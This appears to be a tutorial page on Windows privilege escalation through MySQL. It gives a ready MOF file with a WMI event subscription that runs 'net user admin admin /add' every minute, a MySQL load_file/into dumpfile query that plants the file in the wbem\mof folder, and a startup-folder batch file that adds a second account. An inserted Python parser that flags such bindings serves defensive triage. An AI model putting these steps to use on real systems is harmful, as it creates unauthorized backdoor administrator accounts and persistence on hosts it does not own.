MOF privilege escalation: how the technique is used
Save the following code as a .mof file:
#pragma namespace("\\\\.\\root\\subscription")
// Filter: fires on the Win32_LocalTime modification event whose Second field equals 5 (once a minute)
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
// Consumer: the JScript that runs each time the filter fires
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
        "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
// Binding: ties the filter to the consumer, which makes the subscription active
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
Execute the following in MySQL to import the file via a query:
select load_file('<path to the .mof file>') into dumpfile 'c:/windows/system32/wbem/mof/<your_file_name>.mof';
Once the import succeeds, the system compiles and runs the file automatically.
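As an added defender-side example (not code from the original page), the following Python parses MOF text and reports the filter-to-consumer binding pattern the page's file relies on, so files dropped in the wbem\mof directory can be triaged. The sample MOF is constructed to mirror the page's file with the command replaced by a placeholder, and the parser handles only the instance/property subset shown here.

```python
# Added example, not from the original page: parse MOF text and report WMI permanent event
# subscriptions that bind a filter to a code-executing consumer, the structure the page's MOF uses.
# Triage files dropped in %SystemRoot%\System32\wbem\mof with it; note that Windows Vista and later
# no longer auto-compile MOF files placed there, so the page's technique targets XP/Server 2003.
import re

ACTIVE_CONSUMERS = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}  # consumers that execute code
INSTANCE_RE = re.compile(r"instance\s+of\s+(\w+)(?:\s+as\s+\$(\w+))?\s*\{(.*?)\};", re.S)
# A property value is one or more adjacent string literals (MOF concatenates them) or a bare token.
PROP_RE = re.compile(r'(\w+)\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+|[^;]+);', re.S)
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

def _unescape(s):  # MOF strings use C-style escapes: \" \\ \n \t
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)

def parse_mof(text):
    """Return [{'class', 'alias', 'props'}] for each instance declaration in the text."""
    instances = []
    for cls, alias, body in INSTANCE_RE.findall(text):
        props = {}
        for name, raw in PROP_RE.findall(body):
            raw = raw.strip()  # literals are concatenated and unescaped; $alias references keep the alias name
            props[name] = _unescape("".join(LITERAL_RE.findall(raw))) if raw.startswith('"') else raw.lstrip("$")
        instances.append({"class": cls, "alias": alias or None, "props": props})
    return instances

def find_persistence(text):
    """List every __FilterToConsumerBinding whose consumer runs script or a command line."""
    instances = parse_mof(text)
    by_alias = {i["alias"]: i for i in instances if i["alias"]}
    findings = []
    for b in (i for i in instances if i["class"] == "__FilterToConsumerBinding"):
        consumer = by_alias.get(b["props"].get("Consumer"))
        filt = by_alias.get(b["props"].get("Filter"))
        if consumer and consumer["class"] in ACTIVE_CONSUMERS:
            p = consumer["props"]
            findings.append({"consumer_class": consumer["class"], "consumer_name": p.get("Name"),
                             "trigger": filt["props"].get("Query") if filt else None,
                             "payload": p.get("ScriptText") or p.get("CommandLineTemplate")})
    return findings

# Constructed sample: the page's filter/consumer/binding shape with the command replaced by a placeholder.
SAMPLE_MOF = r'''instance of __EventFilter as $EventFilter
{ Name = "filtP2"; EventNamespace = "Root\\Cimv2"; QueryLanguage = "WQL";
  Query = "Select * From __InstanceModificationEvent "
          "Where TargetInstance Isa \"Win32_LocalTime\" And TargetInstance.Second = 5"; };
instance of ActiveScriptEventConsumer as $Consumer
{ Name = "consPCSV2"; ScriptingEngine = "JScript";
  ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"SAMPLE_COMMAND\")"; };
instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };'''
```

Calling find_persistence() on a file's text returns one entry per active binding with the triggering WQL query and the script or command it would run; an empty list means no code-executing subscription was found.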
Startup-folder privilege escalation
@echo off
net user dodo dodo /add
Save the code above as a .bat file.
Import the file via a query:
select load_file('<path to the .bat file>') into dumpfile '<the system's startup folder>/<your_file_name>.bat';
It takes effect when the system restarts.